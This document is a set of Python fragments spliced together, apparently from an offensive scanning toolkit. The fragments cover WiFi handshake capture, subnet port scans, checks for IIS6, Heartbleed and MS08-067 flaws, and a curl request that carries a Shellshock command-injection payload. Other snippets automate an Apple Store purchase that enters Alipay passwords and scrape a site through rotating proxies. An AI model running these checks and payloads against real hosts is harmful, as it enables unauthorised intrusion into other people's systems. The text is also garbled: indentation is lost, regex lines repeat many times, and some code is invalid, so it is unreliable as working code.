def worker2():
# 这里进行cap包是否得到handshake的检测
# 这里用aircrack-ng来测试是否已经得到handshake握手包
while 1:
# 每60s检测一次
time.sleep(10)
os.system(
"aircrack-ng -w /tmp/forhandshakedict.txt -b %s /tmp/*.cap | tee /tmp/xwifiresult.txt"
% bssid)
with open("/tmp/xwifiresult.txt", "r+") as f:
content = f.read()
if re.search(r"(no data)|(No valid)", content, re.I) or content == "":
print(
"I am sniffing a handshake but no one logins the wifi,so you have to wait,keep me running..."
)
sniffPID = get_string_from_command(
"ps -a | ack '\d+(?=\s+\S+\s+\d+:\d+\.\d+\sairport.*sniff)' -o"
)
os.system("kill %s" % sniffPID)
os.system("rm /tmp/*.cap")
p1 = Process(target=worker1, args=())
p1.start()
# 下面这里不能join,如果join了就会一直无法运行到下面的continue了
# p1.join()
continue
else:
break
sniffPID = get_string_from_command(
"ps -a | ack '\d+(?=\s+\S+\s+\d+:\d+\.\d+\sairport.*sniff)' -o")
os.system("kill %s" % sniffPID)
print("Congratulations! Got handshake!")
def domain_has_cdn(self):
# 检测domain是否有cdn
# 有cdn时,返回一个字典,如果cdn是cloudflare,返回{'has_cdn':1,'is_cloud_flare':1}
# 否则返回{'has_cdn':1,'is_cloud_flare':0}或{'has_cdn':0,'is_cloud_flare':0}
import re
CLIOutput().good_print("现在检测domain:%s是否有cdn" % self.domain)
has_cdn = 0
# ns记录和mx记录一样,都要查顶级域名,eg.dig +short www.baidu.com ns VS dig +short baidu.com ns
result = get_string_from_command("dig ns %s +short" %
get_root_domain(self.domain))
pattern = re.compile(
r"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)",
re.I)
cloudflare_pattern = re.compile(r"cloudflare", re.I)
if re.search(pattern, result):
if re.search(cloudflare_pattern, result):
print("has_cdn=1 from ns,and cdn is cloudflare")
return {'has_cdn': 1, 'is_cloud_flare': 1}
else:
print("has_cdn=1 from ns")
return {'has_cdn': 1, 'is_cloud_flare': 0}
else:
# 下面通过a记录个数来判断,如果a记录个数>1个,认为有cdn
result = get_string_from_command("dig a %s +short" % self.domain)
find_a_record_pattern = re.findall(r"((\d{1,3}\.){3}\d{1,3})",
result)
if find_a_record_pattern:
ip_count = 0
for each in find_a_record_pattern:
ip_count += 1
if ip_count > 1:
has_cdn = 1
return {'has_cdn': 1, 'is_cloud_flare': 0}
return {'has_cdn': 0, 'is_cloud_flare': 0}
def get_c_80_or_443_list(self, ip):
# 得到ip的整个c段的开放80端口或443端口的ip列表
if "not found" in get_string_from_command("nmap"):
#这里不用nmap扫描,nmap扫描结果不准
#os.system("apt-get install masscan")
print("[-]需要安装nmap命令")
return 0
scanPort = self.port
print("[*]现在进行 %s 的c段开了 %s 端口机器的扫描" % (ip, scanPort))
'''
if self.http_or_https=="http":
scanPort=80
print("[*]现在进行%s的c段开了80端口机器的扫描" % ip)
if self.http_or_https=="https":
scanPort=443
print("[*]现在进行%s的c段开了443端口机器的扫描" % ip)
'''
popen = subprocess.Popen(
"nmap -p %s -sS -sV -T4 -v -n --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -Pn --open %s/24"
% (scanPort, ip),
stdout=subprocess.PIPE,
shell=True,
close_fds=True)
#masscan_command = "nmap -p %d -sS -sV -T4 -v -F -n --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -Pn --open %s/24 > ./masscan.txt" % (scanPort,ip)
result, drr = popen.communicate()
result = result.decode("utf-8", "ignore")
allIP = re.findall("((\\d{1,3}\\.){3}\\d{1,3})", result)
ipList = []
for each in allIP:
ipList.append(each[0])
#print(ipList)
ipList = list(set(ipList)) #去重处理
return ipList
def get_ip_from_mx_record(self):
# 从mx记录中得到ip列表,尝试从mx记录中的c段中找真实ip
print("尝试从mx记录中找和%s顶级域名相同的mx主机" % self.domain)
import socket
# domain.eg:www.baidu.com
from exp10it import get_root_domain
root_domain = get_root_domain(self.domain)
from exp10it import get_string_from_command
result = get_string_from_command("dig %s +short mx" % root_domain)
sub_domains_list = re.findall(r"\d{1,} (.*\.%s)\." % root_domain.replace(".", "\."), result)
ip_list = []
for each in sub_domains_list:
print(each)
ip = socket.gethostbyname_ex(each)[2]
if ip[0] not in ip_list:
ip_list.append(ip[0])
return ip_list
def get_c_80_or_443_list(self,ip):
# 得到ip的整个c段的开放80端口或443端口的ip列表
if "not found" in get_string_from_command("masscan"):
#这里不用nmap扫描,nmap扫描结果不准
os.system("apt-get install masscan")
if self.http_or_https=="http":
scanPort=80
CLIOutput().good_print("现在进行%s的c段开了80端口机器的扫描" % ip)
if self.http_or_https=="https":
scanPort=443
CLIOutput().good_print("现在进行%s的c段开了443端口机器的扫描" % ip)
masscan_command = "masscan -p%d %s/24 > /tmp/masscan.out" % (scanPort,ip)
os.system(masscan_command)
with open("/tmp/masscan.out", "r+") as f:
strings = f.read()
#os.system("rm /tmp/masscan.out")
import re
allIP=re.findall(r"((\d{1,3}\.){3}\d{1,3})",strings)
ipList=[]
for each in allIP:
ipList.append(each[0])
print(ipList)
return ipList
import sys
from exp10it import COMMON_NOT_WEB_PORT_LIST
from exploit import get_target_open_port_list
current_dir = os.path.split(os.path.realpath(__file__))[0]
target = sys.argv[1]
print("checking iis vul for " + target)
domain = target.split("/")[-1]
open_port_list = get_target_open_port_list(target)
for each_port in open_port_list:
if each_port not in COMMON_NOT_WEB_PORT_LIST:
server_type = get_server_type(target)
if not re.search(r"iis/6", server_type, re.I):
continue
a = get_string_from_command("cd %s && python2 iis6.py %s %s" %
(current_dir, domain, each_port))
if re.search(r"HHIT CVE-2017-7269 Success", a, re.I):
string_to_write = "Congratulations! 存在iis6.0远程溢出漏洞:\n%s:%s" % (
domain, each_port)
CLIOutput.good_print(string_to_write)
with open("%s/result.txt" % current_dir, "a+") as f:
f.write(string_to_write)
else:
print(
"coz I found no nmap scan result from database,I will test only on the default port but not test on all open ports"
)
from exp10it import COMMON_NOT_WEB_PORT_LIST
from exp10it import get_http_domain_from_url
from exp10it import get_target_open_port_list
current_dir = os.path.split(os.path.realpath(__file__))[0]
target = sys.argv[1]
print("checking heartbleed vul for " + target)
open_port_list = get_target_open_port_list(target)
http_domain = get_http_domain_from_url(target)
hostname = urlparse(target).hostname
target_table_name = get_target_table_name_list(target)[0]
parsed = urlparse(target)
open_port_list = get_target_open_port_list(target)
if ":" in parsed.netloc:
open_port_list.append(parsed.netloc.split(":")[1])
for each in open_port_list:
if each not in COMMON_NOT_WEB_PORT_LIST:
a = get_string_from_command("cd %s && python2 ssltest.py -p %s %s " %
(current_dir, each, hostname))
if re.search(r"server is vulnerable", a, re.I):
string_to_write = "Congratulations! heartbleed vul exists on %s:%s" % (
hostname, each)
CLIOutput().good_print(string_to_write)
with open("%s/result.txt" % current_dir, "a+") as f:
f.write(string_to_write)
else:
print(
"coz I found no nmap scan result from database,I will not run heartbleed vul check module on other ports"
)
def buy_ipx():
if module_exist("selenium") is False:
os.system("pip3 install selenium")
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
result = get_string_from_command("phantomjs --help")
if re.search(r"(not found)|(不是内部或外部命令)|(Unknown command)", result,re.I):
if platform.system() == "Darwin":
os.system("brew install phantomjs")
elif platform.system() == 'Linux':
os.system("echo y | apt-get install phantomjs")
elif platform.system() == 'Windows':
import wget --no-cache
try:
wget --no-cache.download(
"https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-windows.zip", out="phantomjs.zip")
except:
print(
"Please download phantomjs from the official site and add the executeable file to your path")
input("下载速度太慢,还是手工用迅雷下载吧,下载后将可执行文件phantomjs.exe存放到PATH中,再按任意键继续...")
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions
if proxy_url == "" or proxy_url == 0:
service_args_value = ['--ignore-ssl-errors=true',
'--ssl-protocol=any', '--web-security=false']
if proxy_url != "" and proxy_url != 0:
proxy_type = proxy_url.split(":")[0]
proxy_value_with_type = proxy_url.split("/")[-1]
service_args_value = ['--ignore-ssl-errors=true', '--ssl-protocol=any', '--web-security=false',
'--proxy=%s' % proxy_value_with_type, '--proxy-type=%s' % proxy_type]
#service_args_value.append('--load-images=no') ##关闭图片加载
service_args_value.append('--disk-cache=yes') ##开启缓存
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
dcap = dict(DesiredCapabilities.PHANTOMJS)
ua = "Mozilla/4.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0"
#headers = {'User-Agent': '%s' % get_random_ua(),'Cookie': '%s' % cookie}
if cookie!="":
headers = {'User-Agent': '%s' % ua,'Cookie': '%s' % cookie}
else:
headers = {'User-Agent': '%s' % ua}
for key in headers:
capability_key = 'phantomjs.page.custom_headers.{}'.format(key)
webdriver.DesiredCapabilities.PHANTOMJS[capability_key] = headers[key]
driver = webdriver.PhantomJS(service_args=service_args_value)
driver.implicitly_wait(300)
driver.set_page_load_timeout(300)
print("目前没有登录,现在访问收藏夹,尝试跳转到登录页面")
driver.get("https://www.apple.com/cn/shop/favorites")
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.NAME, 'login-apple_id')
)
)
user_text_box=driver.find_element_by_name('login-apple_id')
user_text_box.clear()
user_text_box.send_keys(apple_id)
pass_text_box=driver.find_element_by_name('login-password')
pass_text_box.clear()
pass_text_box.send_keys(apple_id_pass)
login_button=driver.find_element_by_id('sign-in')
print("现在点击登录按钮")
login_button.click()
import random
#driver.get_screenshot_as_file("/tmp/PhantomJSPic")
title = driver.title
print(title)
content = driver.page_source
while True:
pic_links=driver.find_elements_by_class_name('relatedlink')
if pic_links and len(pic_links)>0:
print(len(pic_links))
break
else:
time.sleep(1)
continue
#attention!!!!!!!!这里要修改,[1]和[2]是iphonex
pic_links[try_index-1].click()
#driver.get_screenshot_as_file("/tmp/PhantomJSPic0")
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.NAME, 'add-to-cart')
)
)
add_to_cart_link=driver.find_element_by_name('add-to-cart')
add_to_cart_link.click()
print("现在加入到购物车")
#driver.get_screenshot_as_file("/tmp/PhantomJSPic1")
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.ID, 'cart-actions-checkout')
)
)
jie_zhang_link=driver.find_element_by_id('cart-actions-checkout')
print("现在点击结帐")
jie_zhang_link.click()
#driver.get_screenshot_as_file("/tmp/PhantomJSPic2")
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.NAME, 'login-apple_id')
)
)
user_text_box=driver.find_element_by_name('login-apple_id')
user_text_box.clear()
user_text_box.send_keys('xxx')
pass_text_box=driver.find_element_by_name('login-password')
pass_text_box.clear()
pass_text_box.send_keys('xxx')
login_button=driver.find_element_by_id('sign-in')
print("现在点击登录按钮")
login_button.click()
driver.get_screenshot_as_file("/tmp/PhantomJSPic3")
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.ID ,'cart-continue-button')
)
)
continue_button1=driver.find_element_by_id('cart-continue-button')
continue_button1.click()
continue_button2=driver.find_element_by_id('shipping-continue-button')
continue_button2.click()
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.ID ,'payment-form-options-Alipay-0')
)
)
zhifubao_button=driver.find_element_by_id('payment-form-options-Alipay-0')
zhifubao_button.click()
payment_continue_button=driver.find_element_by_id('payment-continue-button')
payment_continue_button.click()
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.ID ,'invoice-next-step')
)
)
invoice_next_step_button=driver.find_element_by_id('invoice-next-step')
invoice_next_step_button.click()
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.ID ,'terms-accept')
)
)
terms_accept_button=driver.find_element_by_id('terms-accept')
terms_accept_button.click()
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.ID ,'terms-continue-button')
)
)
terms_continue_button=driver.find_element_by_id('terms-continue-button')
terms_continue_button.click()
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.ID ,'place-order-button')
)
)
place_order_button=driver.find_element_by_id('place-order-button')
place_order_button.click()
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.ID ,'pay_now')
)
)
pay_now_button=driver.find_element_by_id('pay_now')
pay_now_button.click()
WebDriverWait(driver, 300).until(
expected_conditions.element_to_be_clickable(
(By.ID,'J_tLoginId')
)
)
zhifubao_username_box=driver.find_element_by_id('J_tLoginId')
zhifubao_username_box.click()
zhifubao_username_box.clear()
zhifubao_username_box.send_keys(zhifubao_username)
zhifubao_pass_box=driver.find_element_by_id('pay_passwd_rsainput')
zhifubao_pass_box.click()
#zhifubao_pass_box.clear()
zhifubao_pass_box.send_keys(zhifumima)
driver.get_screenshot_as_file("/tmp/PhantomJSPic4")
os.system("open /tmp/PhantomJSPic4")
time.sleep(3)
print("现在在支付宝中确认付款")
driver.get_screenshot_as_file("/tmp/PhantomJSPic5")
driver.find_element_by_id('J_newBtn').click()
os.system("open /tmp/PhantomJSPic5")
WebDriverWait(driver, 300).until(
expected_conditions.url_contains(
'standard/lightpay/light_pay_cashier.htm'
)
)
tmp=driver.find_element_by_id('pay_password_rsainput')
tmp.click()
tmp.send_keys(zhifumima)
driver.get_screenshot_as_file("/tmp/PhantomJSPic6")
print("最后确认付款")
tmp=driver.find_element_by_id('J_authSubmit')
tmp.click()
#############################################################
### __ / _ | \_) |
### _ \\ \ / _ \ | ( || _|
### ___/ _\_\.__/_|\__/_|\__|
### _|
###
### name: 3xp10it.py
### function: exp10itScanner
### date: 2016-11-07
### author: quanyechavshuo
### blog: http://3xp10it.cc
#############################################################
import re
import os
import time
os.system("pip3 install exp10it -U --no-cache-dir")
from exp10it import figlet2file
from exp10it import exp10itScanner
from exp10it import get_string_from_command
figlet2file("3xp10it", 0, True)
time.sleep(1)
a = get_string_from_command("apt list python-requests")
if not re.search(r"python-requests", a, re.I):
os.system("apt-get install python-requests")
a = get_string_from_command("apt list python-dnspython")
if not re.search(r"python-dnspython", a, re.I):
os.system("apt-get install python-dnspython")
exp10itScanner()
"/cgi-bin/webmail.cgi",
]
target = sys.argv[1]
print("checking shellshock vul for " + target)
http_domain = get_http_domain_from_url(target)
urls = get_target_urls_from_db(target, "exp10itdb")
urls.append(target)
for each_url in urls:
if "^" in each_url:
each_url = each_url.split("^")[0]
parsed = urlparse(each_url)
url = parsed.scheme + "://" + parsed.netloc + parsed.path
if re.search(r"\.cgi$", url, re.I):
a = get_string_from_command(
"curl '%s' -A '() { :; }; echo; echo `id`' -k" % url)
if re.search(r"uid=", a, re.I):
string_to_write = "Congratulations! shellshock vul exists on %s\n%s" % url
CLIOutput().good_print(string_to_write)
with open("%s/result.txt" % current_dir, "a+") as f:
f.write(string_to_write)
else:
print("no shellshock vul")
if target[:4] == "http":
hostname = urlparse(target).hostname
target_table_name = get_target_table_name_list(target)[0]
open_port_list = get_target_open_port_list(target)
parsed = urlparse(target)
import os
import re
import requests
os.system("pip3 install exp10it -U")
from exp10it import get_string_from_command
from exp10it import get_request
sysinfo = get_string_from_command("uname -a")
# 安装git,为了后面能安装vundle
a=get_string_from_command("git help")
if re.search(r"(未找到命令)|(not found)|(unknown command)",a,re.I):
if re.search(r"(ubuntu)|(debain)",sysinfo,re.I):
os.system("apt-get install git")
if re.search(r"darwin",sysinfo,re.I):
os.system("brew install git")
with open("/etc/shells", "r") as f:
content = f.read()
pur = input("1.只更新配置文件\n2.安装zsh+vim+tmux+配置文件\n3.安装fish+vim+tmux+配置文件\ninput your choose here:>")
if pur == '1':
pass
elif pur == '2':
# 下面设置zsh为默认shell
if not re.search(r"/bin/zsh", content, re.I):
os.system('''echo "/bin/zsh" | sudo tee -a /etc/shells''')
os.system("chsh -s `which zsh`")
# 下面安装oh-my-zsh
os.system('''sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" && exit''')
# 上面之后要退出zsh,要不然后续的安装过程无法继续(除非人工ctrl+d)
else:
# test on:macOS sierra 10.12.5
import time
import os
os.system("pip3 install exp10it -U --no-cache --retries 0")
from exp10it import figlet2file
figlet2file("xwifi", 0, True)
time.sleep(1)
from exp10it import get_string_from_command
from exp10it import get_all_file_name
from multiprocessing import Process
import re
import time
import sys
os.system("echo testfor_handshake > /tmp/forhandshakedict.txt")
a = get_string_from_command("ack")
if re.search(r"not found", a, re.I):
input(
"Please install ack first,eg.brew install ack,after you finished it,press anykey to continue."
)
a = get_string_from_command("airport")
if re.search(r"not found", a, re.I):
a = get_string_from_command(
'''find /System/Library -name "airport" | ack "^/.*/airport$"''')
os.system("ln -s %s /usr/local/bin/airport" % a)
#print("add your airport to path,then run me again.")
a = get_string_from_command("aircrack-ng")
if re.search(r"not found", a, re.I):
input(
"Please install aircrack-ng first,eg.brew install aircrack-ng,after you finished it,press anykey to continue."
page.open(server, 'post', data, function (status) {
if (status !== 'success') {
console.log('Unable to post!');
} else {
console.log(page.content);
}
phantom.exit();
});
''' % (qihao, ++i)
while True:
os.system("rm post.js")
with open("post.js", "a+") as f:
f.write(post_js_content)
proxy_addr = get_random_proxy()
print(proxy_addr)
html = get_string_from_command("phantomjs post.js --proxy=%s" %
proxy_addr)
has_page_no = re.search(r"/(\d+)页", html)
if has_page_no:
break
else:
print("没有获取到页数,尝试再次获取...")
continue
page_no = has_page_no.group(1)
print("期号:%s,页数:%s" % (qihao, page_no))
page_list = []
for page in range(1, int(page_no) + 1):
page_list.append(str(page))
def get_page_content(page):
data = "page_no=%s&issue_number=%s&apply_code=" % (page, qihao)
def domain_has_cdn(self):
# 检测domain是否有cdn
# 有cdn时,返回一个字典,如果cdn是cloudflare,返回{'has_cdn':1,'is_cloud_flare':1}
# 否则返回{'has_cdn':1,'is_cloud_flare':0}或{'has_cdn':0,'is_cloud_flare':0}
import re
print("[*]现在检测domain:%s是否有cdn" % self.domain)
has_cdn = 0
# ns记录和mx记录一样,都要查顶级域名,eg.dig +short www.baidu.com ns VS dig +short baidu.com ns
popen = subprocess.Popen("nslookup -type=ns %s" %
get_root_domain(self.domain),
stdout=subprocess.PIPE,
shell=True,
close_fds=True)
#result = get_string_from_command("nslookup -type=ns %s" % get_root_domain(self.domain))
result, drr = popen.communicate()
result = result.decode("utf-8", "ignore")
pattern = re.compile(
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)"
r"(cloudflare)|(cdn)|(cloud)|(fast)|(incapsula)|(photon)|(cachefly)|(wppronto)|(softlayer)|(incapsula)|(jsdelivr)|(akamai)",
re.I)
cloudflare_pattern = re.compile(
"cloudflare"
"cloudflare"
"cloudflare"
"cloudflare"
"cloudflare"
"cloudflare"
"cloudflare"
"cloudflare"
"cloudflare"
"cloudflare"
"cloudflare"
"cloudflare"
"cloudflare"
r"cloudflare", re.I)
if re.search(pattern, result):
if re.search(cloudflare_pattern, result):
print("has_cdn=1 from ns,and cdn is cloudflare")
return {'has_cdn': 1, 'is_cloud_flare': 1}
else:
print("has_cdn=1 from ns")
return {'has_cdn': 1, 'is_cloud_flare': 0}
else:
# 下面通过a记录个数来判断,如果a记录个数>1个,认为有cdn
result = get_string_from_command("nslookup -type=a %s" %
self.domain)
find_a_record_pattern = re.findall("((\\d{1,3}\\.){3}\\d{1,3})",
result)
#print(find_a_record_pattern)
if find_a_record_pattern:
ip_count = 0
for each in find_a_record_pattern:
ip_count += 1
if ip_count > 1:
has_cdn = 1
return {'has_cdn': 1, 'is_cloud_flare': 0}
return {'has_cdn': 0, 'is_cloud_flare': 0}
# This debug.py is for developers.Do not run it if you just want to run 3xp10it but not develop it.
import os
import re
import sys
exp10it_module_path = os.path.expanduser("~") + "/mypypi"
sys.path.insert(0, exp10it_module_path)
from exp10it import execute_sql_in_db
from exp10it import get_string_from_command
from exp10it import CONFIG_INI_PATH
if os.path.exists(CONFIG_INI_PATH):
db_name = "exp10itdb"
a = input("1.删除config.ini和exp10itdb\n2....\n>")
if a == '1':
result = get_string_from_command("mysql")
if re.search(r"Can't connect", result, re.I):
os.system("service mysql start")
execute_sql_in_db("drop database %s" % db_name)
os.system("rm %s" % CONFIG_INI_PATH)
else:
print("%s not exist" % CONFIG_INI_PATH)
import os
import sys
exp10it_module_path = os.path.expanduser("~") + "/exp10it"
sys.path.insert(0, exp10it_module_path)
import re
import time
from urllib.parse import urlparse
from exp10it import get_string_from_command
from exp10it import CLIOutput
target = sys.argv[1]
print("checking ms08-067 vul for " + target)
current_dir = os.path.split(os.path.realpath(__file__))[0]
current_log_file = "/tmp/commix_" + str(time.time())
if target[:4] == "http":
target = urlparse(target).hostname
cmd = "nmap --script=smb-vuln-ms08-067 %s 2>&1 | tee %s" % (target,
current_log_file)
a = get_string_from_command(cmd)
if re.search(r"VULNERABLE", a, re.I):
os.system("mv %s %s/result.txt" % (current_log_file, current_dir))
CLIOutput().good_print("Congratulations! MS10-010 exists on %s" % target)
else:
os.system("rm %s" % current_log_file)
page.open(server, 'post', data, function (status) {
if (status !== 'success') {
console.log('Unable to post!');
} else {
console.log(page.content);
}
phantom.exit();
});
''' % (qihao, ++i)
while True:
os.system("rm post.js")
with open("post.js", "a+") as f:
f.write(post_js_content)
proxy_addr = get_random_proxy()
print(proxy_addr)
html = get_string_from_command(
"phantomjs post.js --proxy=%s" % proxy_addr)
has_page_no = re.search(r"/(\d+)页", html)
if has_page_no:
break
else:
print("没有获取到页数,尝试再次获取...")
continue
page_no = has_page_no.group(1)
print("期号:%s,页数:%s" % (qihao, page_no))
page_list = []
for page in range(1, int(page_no) + 1):
page_list.append(str(page))
def get_page_content(page):
data = "page_no=%s&issue_number=%s&apply_code=" % (page, qihao)
